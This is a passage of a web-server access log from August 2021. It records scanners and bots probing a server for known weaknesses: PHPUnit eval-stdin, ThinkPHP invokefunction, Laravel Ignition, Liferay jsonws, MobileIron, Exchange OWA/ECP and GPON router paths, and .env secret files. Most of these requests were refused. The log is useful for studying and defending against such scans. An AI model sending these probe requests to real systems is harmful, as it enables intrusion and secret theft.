5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [15/Aug/2021:17:01:08 +0000] 444 - GET https 192.168.1.12 "/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [15/Aug/2021:17:01:08 +0000] 444 - GET https 192.168.1.12 "/ui/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [15/Aug/2021:17:01:08 +0000] 444 - GET https 192.168.1.12 "/ui/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [15/Aug/2021:17:01:08 +0000] 444 - GET https 192.168.1.12 "/favicon.ico" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [15/Aug/2021:17:01:08 +0000] 444 - GET https 192.168.1.12 "/favicon.ico" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [15/Aug/2021:17:07:31 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.220.153] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [15/Aug/2021:17:19:21 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx" [Client 192.241.207.113] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [15/Aug/2021:18:42:01 +0000] 444 - GET https 64.22.31.253 "/actuator/health" [Client 192.241.214.216] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [15/Aug/2021:20:44:31 +0000] 400 - GET http localhost "/" [Client 167.172.157.45] [Length 252] [Gzip -] "-" "-" [15/Aug/2021:21:02:49 +0000] 444 - GET https 64.22.31.253 "/" [Client 162.142.125.194] [Length 0] [Gzip -] "-" "-" [15/Aug/2021:21:02:51 +0000] 400 - GET http 64.22.31.253 "/" [Client 162.142.125.194] [Length 252] [Gzip -] "-" "-" [15/Aug/2021:21:02:51 +0000] 400 - GET http 64.22.31.253 "/" [Client 162.142.125.194] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" [15/Aug/2021:21:10:08 +0000] 400 - GET http 64.22.31.253 "/manager/text/list" [Client 192.241.211.103] [Length 252] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [15/Aug/2021:23:06:06 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.213.178] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [15/Aug/2021:23:56:24 +0000] 444 - GET https 64.22.31.253 "/" [Client 192.241.218.42] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [16/Aug/2021:00:02:19 +0000] 400 - GET http 64.22.31.253 "/manager/html" [Client 192.241.212.76] [Length 252] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [16/Aug/2021:00:51:09 +0000] 444 - GET https 64.22.31.253 "/" [Client 167.248.133.60] [Length 0] [Gzip -] "-" "-" [16/Aug/2021:00:51:10 +0000] 400 - GET http 64.22.31.253 "/" [Client 167.248.133.60] [Length 252] [Gzip -] "-" "-" [16/Aug/2021:00:51:10 +0000] 400 - GET http 64.22.31.253 "/" [Client 167.248.133.60] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" [16/Aug/2021:01:06:32 +0000] 444 - GET https 64.22.31.253 "/dns-query?dns=KhUBAAABAAAAAAAAA3d3dwZnb29nbGUDY29tAAABAAE" [Client 147.139.170.102] [Length 0] [Gzip -] "Go-http-client/1.1" "-" [16/Aug/2021:01:07:04 +0000] 444 - GET https 64.22.31.253 "/dns-query?dns=KhUBAAABAAAAAAAAA3d3dwZnb29nbGUDY29tAAABAAE" [Client 147.139.170.102] [Length 0] [Gzip -] "Go-http-client/1.1" "-" [16/Aug/2021:01:07:54 +0000] 444 - GET https 64.22.31.253 "/dns-query?dns=KhUBAAABAAAAAAAAA3d3dwZnb29nbGUDY29tAAABAAE" [Client 147.139.170.102] [Length 0] [Gzip -] "Go-http-client/1.1" "-" [16/Aug/2021:01:08:09 +0000] 444 - GET https 64.22.31.253 "/dns-query?dns=KhUBAAABAAAAAAAAA3d3dwZnb29nbGUDY29tAAABAAE" [Client 147.139.170.102] [Length 0] [Gzip -] "Go-http-client/1.1" "-" [16/Aug/2021:01:15:52 +0000] 400 - - http localhost "-" [Client 66.240.205.34] [Length 154] [Gzip -] "-" "-" [16/Aug/2021:01:37:48 +0000] 444 - GET https 64.22.31.253 "/" [Client 64.62.197.62] [Length 0] [Gzip -] "-" "-" [16/Aug/2021:03:29:28 +0000] 400 - - http localhost "-" [Client 66.240.205.34] [Length 154] [Gzip -] "-" "-" [16/Aug/2021:04:33:45 +0000] 444 - POST https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [16/Aug/2021:04:33:45 +0000] 444 - GET https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [16/Aug/2021:04:33:47 +0000] 444 - GET https 64.22.31.253 "/index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [16/Aug/2021:04:33:47 +0000] 444 - GET https 64.22.31.253 "/?XDEBUG_SESSION_START=phpstorm" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [16/Aug/2021:04:33:48 +0000] 444 - POST https 64.22.31.253 "/mifs/.;/services/LogService" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "https://64.22.31.253:443" [16/Aug/2021:04:33:50 +0000] 444 - GET https 64.22.31.253 "/wp-content/plugins/wp-file-manager/readme.txt" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [16/Aug/2021:04:33:51 +0000] 444 - GET https 64.22.31.253 "/console/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [16/Aug/2021:04:33:51 +0000] 444 - POST https 64.22.31.253 "/Autodiscover/Autodiscover.xml" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [16/Aug/2021:04:33:53 +0000] 444 - GET https 64.22.31.253 "/_ignition/execute-solution" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [16/Aug/2021:04:33:54 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [16/Aug/2021:04:33:54 +0000] 444 - POST https 64.22.31.253 "/api/jsonws/invoke" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [16/Aug/2021:06:24:09 +0000] 400 - - http localhost "-" [Client 185.82.126.13] [Length 154] [Gzip -] "-" "-" [16/Aug/2021:06:45:41 +0000] 444 - GET https 64.22.31.253 "/" [Client 192.35.168.112] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [16/Aug/2021:07:10:36 +0000] 444 - GET https 64.22.31.253 "/" [Client 193.106.29.210] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0" "-" [16/Aug/2021:09:19:23 +0000] 444 - GET https 64.22.31.253 "/" [Client 74.120.14.44] [Length 0] [Gzip -] "-" "-" [16/Aug/2021:09:19:24 +0000] 400 - GET http 64.22.31.253 "/" [Client 74.120.14.44] [Length 252] [Gzip -] "-" "-" [16/Aug/2021:09:19:24 +0000] 400 - GET http 64.22.31.253 "/" [Client 74.120.14.44] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" [16/Aug/2021:10:15:41 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f" [Client 192.241.214.162] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [16/Aug/2021:11:14:31 +0000] 400 - - http localhost "-" [Client 172.104.131.24] [Length 154] [Gzip -] "-" "-" [16/Aug/2021:11:38:06 +0000] 400 - GET https localhost "-" [Client 45.143.200.54] [Length 154] [Gzip -] "-" "-" [16/Aug/2021:11:47:32 +0000] 444 - GET https 64.22.31.253 "/" [Client 193.118.53.194] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [16/Aug/2021:12:59:26 +0000] 444 - GET https admin.moralanimal.net "/.env" [Client 185.254.31.122] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [16/Aug/2021:12:59:26 +0000] 444 - GET https api.moralanimal.net "/.env" [Client 185.254.31.122] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [16/Aug/2021:12:59:26 +0000] 444 - GET https app.moralanimal.net "/.env" [Client 185.254.31.122] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [16/Aug/2021:13:11:32 +0000] 400 - - http localhost "-" [Client 91.220.163.139] [Length 154] [Gzip -] "-" "-" [16/Aug/2021:14:16:41 +0000] 444 - GET https agent.moralanimal.net "/" [Client 198.204.234.254] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.90 Safari/537.36" "http://www.google.com.hk" [16/Aug/2021:16:54:38 +0000] 444 - GET https 64.22.31.253 "/owa/auth/x.js" [Client 192.241.213.213] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [16/Aug/2021:17:07:48 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.217.146] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [16/Aug/2021:17:15:35 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.1.248.42] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [16/Aug/2021:17:18:55 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx" [Client 192.241.213.128] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [16/Aug/2021:17:44:46 +0000] 444 - POST https 192.168.0.1 "/GponForm/diag_Form?style/" [Client 185.222.59.20] [Length 0] [Gzip -] "curl/7.3.2" "-" [16/Aug/2021:18:30:18 +0000] 400 - - http localhost "-" [Client 91.220.163.139] [Length 154] [Gzip -] "-" "-" [16/Aug/2021:18:49:02 +0000] 444 - GET https 64.22.31.253 "/actuator/health" [Client 192.241.212.85] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [16/Aug/2021:20:05:14 +0000] 444 - GET https 64.22.31.253 "/" [Client 80.82.77.192] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36" "-" [16/Aug/2021:20:06:52 +0000] 400 - GET http 64.22.31.253 "/" [Client 80.82.77.192] [Length 252] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [16/Aug/2021:20:47:51 +0000] 444 - GET https 192.168.1.12 "/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [16/Aug/2021:20:47:51 +0000] 444 - GET https 192.168.1.12 "/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [16/Aug/2021:20:47:51 +0000] 444 - GET https 192.168.1.12 "/ui/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [16/Aug/2021:20:47:51 +0000] 444 - GET https 192.168.1.12 "/ui/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [16/Aug/2021:20:47:51 +0000] 444 - GET https 192.168.1.12 "/favicon.ico" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [16/Aug/2021:20:47:51 +0000] 444 - GET https 192.168.1.12 "/favicon.ico" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [16/Aug/2021:20:51:02 +0000] 444 - POST https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [16/Aug/2021:20:51:02 +0000] 444 - GET https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [16/Aug/2021:20:51:03 +0000] 444 - GET https 64.22.31.253 "/index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [16/Aug/2021:20:51:06 +0000] 444 - POST https 64.22.31.253 "/mifs/.;/services/LogService" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "https://64.22.31.253:443" [16/Aug/2021:20:51:06 +0000] 444 - GET https 64.22.31.253 "/?XDEBUG_SESSION_START=phpstorm" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [16/Aug/2021:20:51:07 +0000] 444 - GET https 64.22.31.253 "/wp-content/plugins/wp-file-manager/readme.txt" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [16/Aug/2021:20:51:07 +0000] 444 - GET https 64.22.31.253 "/console/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [16/Aug/2021:20:51:07 +0000] 444 - GET https 64.22.31.253 "/_ignition/execute-solution" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [16/Aug/2021:20:51:07 +0000] 444 - POST https 64.22.31.253 "/Autodiscover/Autodiscover.xml" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [16/Aug/2021:20:51:09 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [16/Aug/2021:20:51:09 +0000] 444 - POST https 64.22.31.253 "/api/jsonws/invoke" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [16/Aug/2021:21:00:26 +0000] 444 - GET https imap.moralanimal.net "/" [Client 144.86.173.16] [Length 0] [Gzip -] "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com" "-" [16/Aug/2021:23:07:29 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.215.225] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [16/Aug/2021:23:47:40 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.1.248.26] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [16/Aug/2021:23:56:43 +0000] 444 - GET https 64.22.31.253 "/" [Client 192.241.206.234] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [17/Aug/2021:01:15:38 +0000] 444 - GET https 64.22.31.253 "/" [Client 193.118.53.202] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [17/Aug/2021:05:14:38 +0000] 444 - GET https 64.22.31.253 "/" [Client 184.105.247.194] [Length 0] [Gzip -] "-" "-" [17/Aug/2021:05:27:58 +0000] 400 - - http localhost "-" [Client 5.188.210.227] [Length 154] [Gzip -] "-" "-" [17/Aug/2021:05:28:25 +0000] 400 - - http localhost "-" [Client 5.188.210.227] [Length 154] [Gzip -] "-" "-" [17/Aug/2021:05:29:07 +0000] 400 - GET http 5.188.210.227 "/echo.php" [Client 5.188.210.227] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" "https://www.google.com/" [17/Aug/2021:06:02:26 +0000] 444 - POST https 192.168.0.1 "/GponForm/diag_Form?style/" [Client 185.222.59.20] [Length 0] [Gzip -] "curl/7.3.2" "-" [17/Aug/2021:06:46:26 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 199.19.224.165] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [17/Aug/2021:07:06:23 +0000] 444 - GET https 64.22.31.253 "/" [Client 71.6.232.7] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.131 Safari/537.36" "-" [17/Aug/2021:08:12:38 +0000] 444 - GET https 64.22.31.253 "/" [Client 213.32.122.82] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" "-" [17/Aug/2021:08:12:38 +0000] 400 - GET http 64.22.31.253 "/" [Client 213.32.122.82] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" "-" [17/Aug/2021:09:39:47 +0000] 444 - POST https 192.168.0.1 "/GponForm/diag_Form?style/" [Client 46.101.111.221] [Length 0] [Gzip -] "curl/7.3.2" "-" [17/Aug/2021:10:16:54 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f" [Client 192.241.204.70] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [17/Aug/2021:10:20:32 +0000] 444 - GET https 64.22.31.253 "/" [Client 154.89.5.20] [Length 0] [Gzip -] "-" "-" [17/Aug/2021:10:46:32 +0000] 400 - - http localhost "-" [Client 141.98.9.21] [Length 154] [Gzip -] "-" "-" [17/Aug/2021:11:21:20 +0000] 444 - GET https 64.22.31.253 "/" [Client 23.90.160.130] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [17/Aug/2021:11:32:59 +0000] 400 - - http localhost "-" [Client 141.98.9.21] [Length 154] [Gzip -] "-" "-" [17/Aug/2021:12:51:23 +0000] 444 - GET https 64.22.31.253 "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [17/Aug/2021:12:51:23 +0000] 444 - GET https 64.22.31.253 "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [17/Aug/2021:15:11:50 +0000] 400 - GET http 64.22.31.253 "/" [Client 65.21.178.99] [Length 252] [Gzip -] "colly - https://github.com/gocolly/colly/v2" "-" [17/Aug/2021:16:54:47 +0000] 444 - GET https 64.22.31.253 "/owa/auth/x.js" [Client 192.241.207.28] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [17/Aug/2021:17:04:00 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.14.209.162] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [17/Aug/2021:17:08:04 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.217.44] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [17/Aug/2021:17:19:05 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx" [Client 192.241.217.51] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [17/Aug/2021:18:45:29 +0000] 444 - POST https 64.22.31.253 "/api/jsonws/invoke" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [17/Aug/2021:18:45:29 +0000] 444 - POST https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [17/Aug/2021:18:45:30 +0000] 444 - GET https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [17/Aug/2021:18:45:32 +0000] 444 - GET https 64.22.31.253 "/index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [17/Aug/2021:18:45:32 +0000] 444 - GET https 64.22.31.253 "/?XDEBUG_SESSION_START=phpstorm" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [17/Aug/2021:18:45:34 +0000] 444 - POST https 64.22.31.253 "/mifs/.;/services/LogService" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "https://64.22.31.253:443" [17/Aug/2021:18:45:35 +0000] 444 - GET https 64.22.31.253 "/wp-content/plugins/wp-file-manager/readme.txt" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [17/Aug/2021:18:45:39 +0000] 444 - GET https 64.22.31.253 "/console/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [17/Aug/2021:18:45:39 +0000] 444 - POST https 64.22.31.253 "/Autodiscover/Autodiscover.xml" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [17/Aug/2021:18:45:42 +0000] 444 - GET https 64.22.31.253 "/_ignition/execute-solution" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [17/Aug/2021:18:45:42 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [17/Aug/2021:18:50:21 +0000] 444 - GET https 64.22.31.253 "/actuator/health" [Client 192.241.217.166] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [17/Aug/2021:19:08:05 +0000] 444 - GET https 64.22.31.253 "/" [Client 165.232.184.101] [Length 0] [Gzip -] "Mozilla/5.0 (iPhone; CPU iPhone OS 8_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B410 Safari/600.1.4" "-" [17/Aug/2021:19:38:00 +0000] 444 - GET https 64.22.31.253 "/" [Client 193.118.53.194] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [17/Aug/2021:20:44:21 +0000] 400 - GET http 64.22.31.253 "/" [Client 89.248.173.131] [Length 252] [Gzip -] "-" "-" [17/Aug/2021:20:45:41 +0000] 444 - GET https 192.168.1.12 "/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [17/Aug/2021:20:45:41 +0000] 444 - GET https 192.168.1.12 "/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [17/Aug/2021:20:45:41 +0000] 444 - GET https 192.168.1.12 "/ui/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [17/Aug/2021:20:45:41 +0000] 444 - GET https 192.168.1.12 "/ui/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) 